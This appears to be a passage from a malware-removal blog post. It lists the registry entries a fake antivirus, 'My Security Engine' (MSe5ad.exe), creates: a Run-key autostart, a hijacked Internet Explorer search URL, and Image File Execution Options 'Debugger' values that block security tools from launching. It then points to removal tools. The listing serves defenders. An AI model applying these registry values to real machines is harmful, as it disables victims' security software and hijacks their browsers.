“UID”=”2045″

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Post Platform]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Post Platform]
“969903903″=”"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Post Platform]
“Version/12.02045″=”"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
“My Security Engine”=”\”C:\\Documents and Settings\\All Users.WINDOWS\\Application Data\\e5adcb6\\MSe5ad.exe\” /s /d”

[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]
“C:\\Documents and Settings\\Administrator\\Desktop\\packupdate_build106_2045.exe”=”packupdate_build106_2045″

[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]
“C:\\WINDOWS\\system32\\taskkill.exe”=”Kill Process”

[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]
“C:\\Documents and Settings\\All Users.WINDOWS\\Application Data\\e5adcb6\\MSe5ad.exe”=”MSe5ad”

[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]
“C:\\WINDOWS\\System32\\Wbem\\mofcomp.exe”=”mofcomp”

[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]
“C:\\WINDOWS\\system32\\netsh.exe”=”Network Command Shell”

[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]
“C:\\WINDOWS\\system32\\cmd.exe”=”Windows Command Processor”

[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]
“C:\\Documents and Settings\\Administrator\\Application Data\\My Security Engine\\winupdate.exe”=”winupdate”

[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]
“C:\\WINDOWS\\system32\\ntvdm.exe”=”NTVDM.EXE”

[HKEY_CURRENT_USER\Software\Classes\Software\Microsoft\Internet Explorer]

[HKEY_CURRENT_USER\Software\Classes\Software\Microsoft\Internet Explorer\SearchScopes]

[HKEY_CURRENT_USER\Software\Classes\Software\Microsoft\Internet Explorer\SearchScopes]
“URL”=”http://findgala.com/?&uid=2045&q={searchTerms}”

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MSe5ad.DocHostUIHandler]

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MSe5ad.DocHostUIHandler]
@=”Implements DocHostUIHandler”

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MSe5ad.DocHostUIHandler\Clsid]

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MSe5ad.DocHostUIHandler\Clsid]
@=”{3F2BBC05-40DF-11D2-9455-00104BC936FF}”

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}]

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}]
@=”Implements DocHostUIHandler”

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\LocalServer32]

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\LocalServer32]
@=”C:\\DOCUME~1\\ALLUSE~1.WIN\\APPLIC~1\\e5adcb6\\MSe5ad.exe”

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\ProgID]

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\ProgID]
@=”MSe5ad.DocHostUIHandler”

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\FWCFG]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\FWCFG]
“EnableFileTracing”=dword:00000000

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\FWCFG]
“EnableConsoleTracing”=dword:00000000

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\FWCFG]
“FileTracingMask”=dword:ffff0000

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\FWCFG]
“ConsoleTracingMask”=dword:ffff0000

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\FWCFG]
“MaxFileSize”=dword:00100000

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\FWCFG]
“FileDirectory”=hex(2):25,77,69,6e,64,69,72,25,5c,74,72,61,63,69,6e,67,00,

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options]
“Debugger”=”svchost.exe”

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\a.exe]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\a.exe]
“Debugger”=”svchost.exe”

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\aAvgApi.exe]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\aAvgApi.exe]
“Debugger”=”svchost.exe”

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AAWTray.exe]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AAWTray.exe]
“Debugger”=”svchost.exe”

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\About.exe]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\About.exe]
“Debugger”=”svchost.exe”

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ackwin32.exe]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ackwin32.exe]
“Debugger”=”svchost.exe”

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Ad-Aware.exe]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Ad-Aware.exe]
“Debugger”=”svchost.exe”

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\adaware.exe]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\adaware.exe]
“Debugger”=”svchost.exe”

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\advxdwin.exe]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\advxdwin.exe]
“Debugger”=”svchost.exe”

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AdwarePrj.exe]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AdwarePrj.exe]
“Debugger”=”svchost.exe”
.

.

.

etc.

Removal Tools :

1 – Download the free version of Malwarebytes that provided by www.malwarebytes.org from Here.

2 – Download MicrosoftFixit50267.msi to fix hosts file from Here.

Related posts:

1. Removal tool for Mal/FakeAV-CO, Downloader-CEW (Vvavia.exe, Vdl.exe, Vdk.exe, Vdj.exe) Malware
2. Removal tool for Suspect-1B!E4800A5BF6F6, Mal/FakeAV-BW (ave.exe) Malware
3. Removal tool for W32/VBSAuto-C, VBS/Slogod.X (Startup.scr, winxp.exe, winjpg.jpg, M.p.jpg) WORM